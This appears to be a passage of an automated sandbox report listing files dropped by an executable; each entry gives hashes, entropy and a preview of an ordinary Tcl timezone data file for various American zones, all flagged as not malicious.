                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.932842207797733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290txP90ppv:MByMYbpwt2907P90b
                                                                                                                                                                                                                              MD5:CBFA61DBF6F7459CF8D517402B29998E
                                                                                                                                                                                                                              SHA1:A562B29C9470DBD25480966B0462433124BA4164
                                                                                                                                                                                                                              SHA-256:353CDBD46BA8C7472A93E9E800A69105801F6784B22EC50A59294CDC3BE40E18
                                                                                                                                                                                                                              SHA-512:00B333EAA2C32EDDA8F06457AD0E10013A0147B20F504F4F1096656F731A7C1896D5ABD83E7EDBD5D4E7DA587EE9BFA796539EB1E9F4056D75D1FDF203251150
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Barthelemy) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11289
                                                                                                                                                                                                                              Entropy (8bit):3.8713946894934614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:PmxVjd1cO8f7/EjUhSicN6zvfwb+8YbTE0M0J:PmrcOI7/EjiskY01J
                                                                                                                                                                                                                              MD5:8F068899DA75663128320633E1881333
                                                                                                                                                                                                                              SHA1:E9161B45D7B11A2DD6E9679AC080E84EC51561E3
                                                                                                                                                                                                                              SHA-256:E2917204B0C843C32051BB371CF6D0AD272C02720B9C0D913AC072C8ABE1EC64
                                                                                                                                                                                                                              SHA-512:2200E9B9D816157330ADAEA7383635876E5A37329B1AF9613D38BCFBE8143835837A25132A94E44A61DB8058ED98B1A33F295EA64BC1F4CE30966D52BB0B673D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/St_Johns) {.. {-9223372036854775808 -12652 0 LMT}.. {-2713897748 -12652 0 NST}.. {-1664130548 -9052 1 NDT}.. {-1650137348 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1598650148 -9052 1 NDT}.. {-1590100148 -12652 0 NST}.. {-1567286948 -9052 1 NDT}.. {-1551565748 -12652 0 NST}.. {-1535837348 -9052 1 NDT}.. {-1520116148 -12652 0 NST}.. {-1503782948 -9052 1 NDT}.. {-1488666548 -12652 0 NST}.. {-1472333348 -9052 1 NDT}.. {-1457216948 -12652 0 NST}.. {-1440883748 -9052 1 NDT}.. {-1425767348 -12652 0 NST}.. {-1409434148 -9052 1 NDT}.. {-1394317748 -12652 0 NST}.. {-1377984548 -9052 1 NDT}.. {-1362263348 -12652 0 NST}.. {-1346534948 -9052 1 NDT}.. {-1330813748 -12652 0 NST}.. {-1314480548 -9052 1 NDT}.. {-1299364148 -12652 0 NST}.. {-1283030948 -9052 1 ND
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.907031043022691
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tMp490ppv:MByMYbpwt290g490b
                                                                                                                                                                                                                              MD5:D521F2D9B28C5374FC3BD540C6B6F40D
                                                                                                                                                                                                                              SHA1:39A3D86CB71F742F33B02F50B316638815B3CD4E
                                                                                                                                                                                                                              SHA-256:EDB9457A7C64E47062BDC6458FD3BCFCD6C37820F1A2BC89DFE99ED77355011F
                                                                                                                                                                                                                              SHA-512:05C1BE92550A962904ED3BB7DECCAC16FCB54D258F24F2AEDF755FCC44E4FEF5F86AB663945809F5D7AFA64178E807BBDAE77048270ED516DFF2C7720A746D52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Kitts) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.9037013606484905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tY90ppv:MByMYbpwt290a90b
                                                                                                                                                                                                                              MD5:9392E5A7BD198B0308F9271E4C7E59B2
                                                                                                                                                                                                                              SHA1:A902440920A0318BC930957C74804A9A51EF7818
                                                                                                                                                                                                                              SHA-256:6727A509BB937CB3446D41B57826DE70C7028E96F088AB5B7F803BEAA18279E8
                                                                                                                                                                                                                              SHA-512:6DA1EAC390E72905DF1A14D82362B499D20FAD6D85F3DF116AE01E566D5D19C6D16E56DA72C458BB6143345EF45F35A53B245488C641D80BFBA200B16A59719E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Lucia) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):203
                                                                                                                                                                                                                              Entropy (8bit):4.919272465019375
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tXIMFJ490ppv:MByMYbpwt290tJ490b
                                                                                                                                                                                                                              MD5:49D0C8DAFCA053C9967EDCC4C0A484B1
                                                                                                                                                                                                                              SHA1:7B4999D4B9AD93306BD411DF2946D741EC597770
                                                                                                                                                                                                                              SHA-256:974AEED3D79124B50265C83D84F23CBE4F0328D00C75F42DD3ABC5D4C0A78DE1
                                                                                                                                                                                                                              SHA-512:378E3657B26C5A039FF82ECCAC7797FF45CBC6479596629B3048164EE4E035F4ECFC557AA9EAF6848E78999B4FF8C63E53C7163BDF6F626ED6111004490D6F80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Thomas) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.909053768717241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tzb+Q90ppv:MByMYbpwt290xyQ90b
                                                                                                                                                                                                                              MD5:6CFB23E7164605CDE380FB7C4D88DF11
                                                                                                                                                                                                                              SHA1:CC513B29AD7B59E600DBCBC97927EB632558F657
                                                                                                                                                                                                                              SHA-256:6B19404D295964EF66F47802836BB728FCE8E6481115797C0B5F200C354D7C8A
                                                                                                                                                                                                                              SHA-512:728987D0925B6E12E8A220920BEDF94180880E78F3F08F6AC740E6304B22D446846068CEA499F61E7032ADB2E700CE31954921D478C9A8B6CB599E05A6292EA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Vincent) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):874
                                                                                                                                                                                                                              Entropy (8bit):4.253846650171654
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290hEbmdHLCvYX4Q19xRv0+RmwPj+uLkQOzL3+ORL4FXgenM7RSslKA1PyKp:5zeOvT4xuyqoYaAxt7l
                                                                                                                                                                                                                              MD5:C91F801CC5E9F78B966D1DF2259C38A8
                                                                                                                                                                                                                              SHA1:D29C970CBFC74684D46AAAD543B73B520775632C
                                                                                                                                                                                                                              SHA-256:939B25C9412B9E25D73F552E87826999FC8C929770E66491D1E4530046D3E758
                                                                                                                                                                                                                              SHA-512:093378E61DE9310F9C48170CBB0FDBD3C79E184DA1489F759B20BCE410006A9D5A793C82E79A46E0AFF0DAA47D9DBAFD605959E491BA9ED4E55D26F293642D32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Swift_Current) {.. {-9223372036854775808 -25880 0 LMT}.. {-2030201320 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-747241200 -21600 0 MDT}.. {-732729600 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {-684342000 -21600 1 MDT}.. {-671040000 -25200 0 MST}.. {-652892400 -21600 1 MDT}.. {-639590400 -25200 0 MST}.. {-631126800 -25200 0 MST}.. {-400086000 -21600 1 MDT}.. {-384364800 -25200 0 MST}.. {-337186800 -21600 1 MDT}.. {-321465600 -25200 0 MST}.. {-305737200 -21600 1 MDT}.. {-292435200 -25200 0 MST}.. {-273682800 -21600 1 MDT}.. {-260985600 -25200 0 MST}.. {73472400 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):341
                                                                                                                                                                                                                              Entropy (8bit):4.638828647226646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2903fDm2OHskeoHxbV1ULhgdrV/uF+IcmJ3/uF+ivi9/uF+SNv:MB862903LmdHsVCn1ULSB/uF+QV/uF+q
                                                                                                                                                                                                                              MD5:4C4034ABAB9E4804CCB23E51694044C9
                                                                                                                                                                                                                              SHA1:7DB24CE83AB2C07E6F6784D27C4E3AC0F149D080
                                                                                                                                                                                                                              SHA-256:1F0503579B0DDDBAF88814A278127D9CD7019EDD3C35F4CBFC0EF11C0EDAFE5B
                                                                                                                                                                                                                              SHA-512:0BC366CD3AB2E1388D11770DC8DEC1FC94C48FDC846ABB6C487828BF9FF15CD9A1C15B33E08F6E48B7F4A6F2AD1617FF12B359784CA4C32256D72422E6825105
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Tegucigalpa) {.. {-9223372036854775808 -20932 0 LMT}.. {-1538503868 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}.. {1146981600 -18000 1 CDT}.. {1154926800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6890
                                                                                                                                                                                                                              Entropy (8bit):3.8331465442823704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:mJInJuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/Bm6BTd69xK7KjhVbHyR3h1gOZM:miFCC
                                                                                                                                                                                                                              MD5:D93B62D5F7EEBC28AC047BED2307CAE8
                                                                                                                                                                                                                              SHA1:8B3E02240A01B5AA42D30E86005E880916432227
                                                                                                                                                                                                                              SHA-256:7FB0CBB101D3B6FBB6B9DAD5446BBF9E6AEC65EC38472739E604F68F6AA9AB7B
                                                                                                                                                                                                                              SHA-512:3648106F4DF84CFD94AAD4E9430F8D3BBCB38A9196DE9A59246DFBBC170FADBF106DD1FD08FE2E4F7319BFFB1C2607E4F5D563C222CED8267483D1A0C388CCE5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Thule) {.. {-9223372036854775808 -16508 0 LMT}.. {-1686079492 -14400 0 AST}.. {670399200 -10800 1 ADT}.. {686120400 -14400 0 AST}.. {701848800 -10800 1 ADT}.. {717570000 -14400 0 AST}.. {733903200 -10800 1 ADT}.. {752043600 -14400 0 AST}.. {765352800 -10800 1 ADT}.. {783493200 -14400 0 AST}.. {796802400 -10800 1 ADT}.. {814942800 -14400 0 AST}.. {828856800 -10800 1 ADT}.. {846392400 -14400 0 AST}.. {860306400 -10800 1 ADT}.. {877842000 -14400 0 AST}.. {891756000 -10800 1 ADT}.. {909291600 -14400 0 AST}.. {923205600 -10800 1 ADT}.. {941346000 -14400 0 AST}.. {954655200 -10800 1 ADT}.. {972795600 -14400 0 AST}.. {986104800 -10800 1 ADT}.. {1004245200 -14400 0 AST}.. {1018159200 -10800 1 ADT}.. {1035694800 -14400 0 AST}.. {1049608800 -10800 1 ADT}.. {1067144400 -14400 0 AST}.. {1081058400 -10800 1 ADT}.. {1099198800 -14400 0 AST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.838326820531248
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7RQtHAIgpRQPN/2903MA90RQk:MByMYzp4t2903MA90D
                                                                                                                                                                                                                              MD5:D68B69B05D8743977BA4815B8AFE8E92
                                                                                                                                                                                                                              SHA1:364796989B6DD0110F1D85A8844419EB49772EC0
                                                                                                                                                                                                                              SHA-256:845101F85A6DAF9DEB58A075473F9E541A0B68461677779B1461DE59E3FA3D18
                                                                                                                                                                                                                              SHA-512:DEAA60DDF1521C269D7D386A7FCC40C8FAFB00EEA6764E6B23F4C65B8F6F596B3D5D2D3F6F7B1C22016C530B8789839F8052FDE1C2794C9F9C700C46DC8A3AEE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Thunder_Bay) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8755
                                                                                                                                                                                                                              Entropy (8bit):3.8521303835918115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:CuS6mjvZk53mtw+N6IkWq/WHQlb/RYRWVIKr7cRRL:26jFOzN6IkWq/WHQt/RY4yP
                                                                                                                                                                                                                              MD5:2F9983FE6248F3BF18ADE00192F4B458
                                                                                                                                                                                                                              SHA1:73F7302C914E442FC50DD4BFF3C57FD310E6455C
                                                                                                                                                                                                                              SHA-256:D7C5CB477A591931FF03C794C84EDB2319760C0B70047B325382F211E28648E3
                                                                                                                                                                                                                              SHA-512:B1F66008F2B62D4E1B59ED1A78A9E4F5D06BE074EB3B2466BDE3C9ED98DE96AD03FACDB8EDA6EE8F8EE890860DE6011F2BB364DE8C1276B31F37C9C525F4EC3F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Tijuana) {.. {-9223372036854775808 -28084 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1451667600 -28800 0 PST}.. {-1343062800 -25200 0 MST}.. {-1234803600 -28800 0 PST}.. {-1222963200 -25200 1 PDT}.. {-1207242000 -28800 0 PST}.. {-873820800 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-761677200 -28800 0 PST}.. {-686073600 -25200 1 PDT}.. {-661539600 -28800 0 PST}.. {-504892800 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}.. {-355330800 -28800 0 PST}.. {-337186800 -25200 1 PDT}.. {-323881200 -28800 0 PST}.. {-305737200 -25200 1 PDT}.. {-292431600 -28800 0 PST}.. {-283968000 -28800 0 PST}.. {189331200 -28800 0 PST}.. {19
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11248
                                                                                                                                                                                                                              Entropy (8bit):3.8061065077303926
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lBew85RnK1a8phYBNXEtCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:lBq5RnK1a8phYTXEItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:0D906EC3F658730131A65C5A770D885F
                                                                                                                                                                                                                              SHA1:BFA72C43BCE0F37F795E974457FBE4A664687B38
                                                                                                                                                                                                                              SHA-256:5A98C6BEDDA4DF608051D702A8E037093A8068E1B85F8F55D42B4468F45662A5
                                                                                                                                                                                                                              SHA-512:CC634DAF4EEC7F57E3AB0C20D891380A7F96DE79602A7B57C6C2BF229DD76A69B399A689FA6D0675380B1432C2115B0C8577DC49C3C9E567A08CAD6FCC3599BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Toronto) {.. {-9223372036854775808 -19052 0 LMT}.. {-2366736148 -18000 0 EST}.. {-1632070800 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1609441200 -18000 0 EST}.. {-1601753400 -14400 1 EDT}.. {-1583697600 -18000 0 EST}.. {-1567357200 -14400 1 EDT}.. {-1554667200 -18000 0 EST}.. {-1534698000 -14400 1 EDT}.. {-1524074400 -18000 0 EST}.. {-1503248400 -14400 1 EDT}.. {-1492365600 -18000 0 EST}.. {-1471798800 -14400 1 EDT}.. {-1460916000 -18000 0 EST}.. {-1440954000 -14400 1 EDT}.. {-1428861600 -18000 0 EST}.. {-1409504400 -14400 1 EDT}.. {-1397412000 -18000 0 EST}.. {-1378054800 -14400 1 EDT}.. {-1365962400 -18000 0 EST}.. {-1346605200 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-1238954400
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.864308662322047
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290RRKl290ppv:MByMYbpwt290V90b
                                                                                                                                                                                                                              MD5:21D152A2359A4EFDE6DCC304F16096F3
                                                                                                                                                                                                                              SHA1:961B3CFB351615604981114A115D396D1F2006A2
                                                                                                                                                                                                                              SHA-256:46A236EC38F3A122D414208328A462B2A937392ECC6C55F673FB7A402F118D96
                                                                                                                                                                                                                              SHA-512:04A2AD6DDC2E7B0D3F95DA1C731FF553F8CBC0DD6BDFC36FB2EDCE755612103E3B4EA6F3AB7FE63CA60976538EFABF40827539DFC35B7E83129BD48471FE514B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Tortola) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9815
                                                                                                                                                                                                                              Entropy (8bit):3.8481935495337356
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:sOR864CjSAG5a9bFzN6IkWq/WHQt/RY4yP:sO664CjSAGYbGBt/M
                                                                                                                                                                                                                              MD5:9423BC81647BC4C37888860CE0518BBB
                                                                                                                                                                                                                              SHA1:37E6E6554576D1DD36C3494EAF0BD169003D870D
                                                                                                                                                                                                                              SHA-256:00B5FB8F37DFF43925C501AEAB039F39F058E002572C4203286317046CC1D700
                                                                                                                                                                                                                              SHA-512:1830CA2B62B7CA6EEB5A924D2148925DF7DD87A7B93B21F4F023E4678EF42DC20BFF57F702923E10F4382FE6757323D21414D094E99FEEB43316DE4A7E5A909E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Vancouver) {.. {-9223372036854775808 -29548 0 LMT}.. {-2713880852 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-747237600 -25200 1 PDT}.. {-733935600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-4
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                                                              Entropy (8bit):4.914983069791254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290RXgr490ppv:MByMYbpwt290xg090b
                                                                                                                                                                                                                              MD5:9F7DA15BE387B8F7DEC5DFFE069F3505
                                                                                                                                                                                                                              SHA1:D298B963B0048E9ECA3BC7B85248506AB1388479
                                                                                                                                                                                                                              SHA-256:561D9D04B0CE0F96A9C351C7D5C30AA1D5A42A3D70066CD9AF0DA6CBC5388DBE
                                                                                                                                                                                                                              SHA-512:606C2A918633C74BD2954D39B00EFA2CD9DA852BC7034F129A04258A65DC74942FA0826E9BC6E4433926E7F1375612554B04845077E434D0CD3BD15832DC6B95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Virgin) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2971
                                                                                                                                                                                                                              Entropy (8bit):3.9652694533791917
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5CeFvmpn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5BmCKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                              MD5:2F2D39B5FB844E170FA7B6AF11B948CA
                                                                                                                                                                                                                              SHA1:3D89672134D979FCF65225A58249380D9C8A4A65
                                                                                                                                                                                                                              SHA-256:8E0BC71BD7146145DDE3C064AE205DF08124FE2402853A9655B0EB799E90F31F
                                                                                                                                                                                                                              SHA-512:6C046D1133C8CCF697C8FB553A1F539948F71FA80BA447B87AA8D1D1D7113B32A6B764C5C1734C615319A27961B6116FCA087EB571869119BE87656FCA351498
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Whitehorse) {.. {-9223372036854775808 -32412 0 LMT}.. {-2188997988 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9695
                                                                                                                                                                                                                              Entropy (8bit):3.8209220355628766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pOEhc8/rvNZONqXXyIjNA604qSScBgN+4ctDzIVQ/c/3hNxTh:pY8DvbO+A604qSBgI7DBch
                                                                                                                                                                                                                              MD5:E8DB00D2B99B308018F4F5E48AC47C3A
                                                                                                                                                                                                                              SHA1:8841467CB264DC9F87FABAADBE90EE2C8DACC80F
                                                                                                                                                                                                                              SHA-256:F3FC5F6D93D1D9EB0F3DED33873F33C47F841797D96439966F8E0A5A189941FA
                                                                                                                                                                                                                              SHA-512:5D684B07332ED53F9F8CB71FFF3B6D0F848426A5E4D9E7DA84E49E358C666F1C3BB9CF21352D939B35B558FC691839E24BC84656317F73C768B474AF5AC480EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
